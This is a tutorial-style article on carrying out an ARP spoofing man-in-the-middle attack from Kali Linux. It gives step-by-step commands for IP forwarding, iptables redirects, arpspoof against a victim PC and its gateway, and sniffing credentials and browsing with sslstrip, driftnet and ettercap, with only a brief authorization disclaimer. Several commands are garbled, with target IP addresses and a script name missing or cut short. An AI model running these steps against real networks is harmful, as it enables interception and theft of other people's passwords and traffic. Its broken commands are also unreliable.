ARP spoofing attack – Kali Linux

ARP (Address Resolution Protocol) resolves an IP address to an Ethernet layer 2 address, the network hardware (MAC) address.

Communication between nodes on the network is established between source and destination using the layer 2 address, i.e. the MAC address. Nodes on the network share their MAC addresses through broadcast.
Every node on the network maintains an ARP cache table which holds the L2 and L3 addressing (IP address and associated MAC address).
To view the ARP table, open a command prompt on Windows or a terminal on Linux and run the command below to list the ARP table.

Windows : C:\> arp -a (list all addresses in the ARP table)
Linux : # arp -a (list all addresses in the ARP table)
Router / firewall : # show arp

ARP spoofing is a technique that manipulates the path between source and destination by poisoning ARP caches. Once the caches are poisoned, packets can be sniffed, captured and monitored.
Note: don’t try this on any public, corporate or unauthorized networks. Perform it only when you have authorization to do so.

Spoofing attack using Kali Linux

In this configuration guide we show packet sniffing and spoofing on Kali Linux.
Let’s assume that you have the nodes below.

1. Attacker PC :- Kali Linux (acts as a man in the middle between the victim PC and the gateway)

In this guide we use Kali Linux as the attacker machine to perform an ARP spoofing attack against the victim PC and the gateway.

2. Victim PC :- Windows

The ARP spoofing attack will convince the victim machine to send all its packets to the attacker machine.

3. Victim Gateway PC :- firewall / router

The ARP spoofing attack on the gateway of the victim PC will convince the gateway to send all return traffic to the attacker PC.

For the ARP spoofing attack in Kali Linux, follow the steps below.

1. Enable IP forwarding
2. IPtables NAT
3. ARP spoofing attack
4. Packet sniffing through sslstrip/driftnet/ettercap/urlsnarf

Step 1: Enable IP forwarding

IP forwarding must be enabled; it is required to redirect traffic through the attacker PC.

disable = 0
enable = 1

# echo "1" > /proc/sys/net/ipv4/ip_forward

View the value set for IP forwarding. This should return 1; if it does not, repeat the step above.

# cat /proc/sys/net/ipv4/ip_forward

Output : 1
# sysctl -p

Step 2: IPtables NAT

Requests arriving on port 80 are redirected to a user-defined port number. With the iptables NAT rule, the victim PC gets internet access through the attacker PC.

# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8880
# iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8883

Requests received for port 80 are redirected to the user-defined port 8880.

Step 3: ARP spoofing attack

Start ARP spoof attack on the victim PC i.e, 192.168.123 and Gateway i.e,

Syntax : arpspoof -i interface -t target-ip target-gateway-ip

ARP spoof attacks on victim PC and associated gateway IP as shown below.

#arpspoof -i eth0 -t

ARP spoof attacks at Victim Gateway as shown below.

#arpspoof -i eth0 -t

Step 4: Packet sniffing through sslstrip/driftnet/ettercap/urlsnarf

sslstrip: a packet sniffing tool which captures sensitive information such as usernames, passwords, email accounts and database user details.

The default sslstrip python scripts are located in /usr/share/sslstrip/

The main executable script ” , run below command to sniff the traffic of target PC “ ” and specify the port defined in iptable nat rule.

#python /usr/share/sslstrip/ -p -s -l 8880

Wait for a while so that sniffed data is recorded in the log /usr/share/sslstrip/sslstrip.log, or use a user-defined file to dump the captured data. For more help on the different options, use the command below.

# sslstrip -h

Press Ctrl+D to stop the service and view the log file.

driftnet: a GUI-based tool which captures screenshots of anything accessed from the browser on the victim PC.
Launch the tool with the command below, but make sure that you have GUI access or are logged in in GUI mode.

# driftnet

ettercap: Ettercap is a tool used for ARP spoof attacks on Windows or Linux operating systems. It can be used from the command line or through a GUI.

# ettercap -i eth0 -T -w /root/output.txt -M arp / /

-i : define specific interface
-T : to launch command execution over the terminal
-M : Man in middle mode
-w : writes sniffed data to a file.
